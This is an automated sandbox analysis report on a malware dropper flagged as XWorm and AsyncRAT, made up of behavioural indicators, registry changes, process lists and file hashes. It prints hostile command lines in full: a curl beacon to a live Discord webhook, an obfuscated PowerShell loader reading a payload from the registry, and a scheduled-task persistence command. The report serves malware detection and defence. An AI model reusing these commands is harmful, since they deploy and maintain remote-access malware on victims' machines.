Analysis Overview
SHA256
7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8
Threat Level: Known bad
The file Dropper Builder.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Modifies security service
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Async RAT payload
Sets service image path in registry
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Checks BIOS information in registry
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of UnmapMainImage
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Modifies registry class
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-22 05:51
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 05:51
Reported
2024-06-22 05:54
Platform
win7-20240220-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2860 created 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2860 set thread context of 1452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1A0391BF-9564-4294-B0A4-06C298929EF9} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1095054768c4da01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\ntshrui.dll,-103 = "S&hare with" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF = 010000000000000030fb7e4768c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15327495092059029896608600068-1704279424-499724045-312915142-1734203391-623858314"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {8BB70116-71DD-4957-97E3-AA92E9FF9BF5} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{daab0e6c-6a8d-4eda-b12e-9f83114d2cb3}
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
Network
Files
memory/2100-0-0x00000000745AE000-0x00000000745AF000-memory.dmp
memory/2100-1-0x0000000000E30000-0x00000000020D0000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
| MD5 | 77a71f3a441aa3bf824967e52413bec5 |
| SHA1 | c3d6df5cfc5eefaadf9bcb3703484e3cadf79588 |
| SHA256 | 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82 |
| SHA512 | 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b |
memory/2640-11-0x0000000001170000-0x0000000001182000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77-aachost.exe
| MD5 | f10712f4faa374be8f37668c5ebed4a6 |
| SHA1 | bb30e941c4f91ae3178539e993abecbfd838fdb0 |
| SHA256 | d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf |
| SHA512 | cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac |
memory/2696-19-0x0000000000F10000-0x0000000000F26000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
| MD5 | 18f497deffe88b6b2cff336a277aface |
| SHA1 | 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e |
| SHA256 | 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5 |
| SHA512 | 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d |
memory/2764-27-0x0000000001030000-0x0000000001076000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77-install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
memory/2764-33-0x00000000001C0000-0x00000000001C6000-memory.dmp
memory/2860-35-0x0000000019FD0000-0x000000001A2B2000-memory.dmp
memory/2860-36-0x0000000000DB0000-0x0000000000DB8000-memory.dmp
memory/2860-37-0x0000000001540000-0x000000000156A000-memory.dmp
memory/2860-38-0x00000000773A0000-0x0000000077549000-memory.dmp
memory/2860-39-0x0000000077280000-0x000000007739F000-memory.dmp
memory/1452-41-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1452-43-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1452-47-0x0000000077280000-0x000000007739F000-memory.dmp
memory/1452-46-0x00000000773A0000-0x0000000077549000-memory.dmp
memory/1452-45-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1452-42-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1452-48-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1452-40-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-54-0x0000000000420000-0x000000000044B000-memory.dmp
memory/436-53-0x00000000003F0000-0x0000000000415000-memory.dmp
memory/436-51-0x00000000003F0000-0x0000000000415000-memory.dmp
memory/436-65-0x00000000373E0000-0x00000000373F0000-memory.dmp
memory/480-80-0x00000000373E0000-0x00000000373F0000-memory.dmp
memory/496-94-0x00000000373E0000-0x00000000373F0000-memory.dmp
memory/496-93-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
memory/496-92-0x0000000000990000-0x00000000009BB000-memory.dmp
memory/496-86-0x0000000000990000-0x00000000009BB000-memory.dmp
memory/480-79-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
memory/480-78-0x0000000000CE0000-0x0000000000D0B000-memory.dmp
memory/480-72-0x0000000000CE0000-0x0000000000D0B000-memory.dmp
memory/436-64-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp
memory/436-63-0x0000000000420000-0x000000000044B000-memory.dmp
memory/504-100-0x0000000000480000-0x00000000004AB000-memory.dmp
memory/436-57-0x0000000000420000-0x000000000044B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 05:51
Reported
2024-06-22 05:54
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2840 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\$77-scchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\$77-scchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77-scchost | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2840 set thread context of 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\EventCache.v2\{4E3A2C56-F6CF-44DC-94A9-BA869AC1A54A}.bin | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
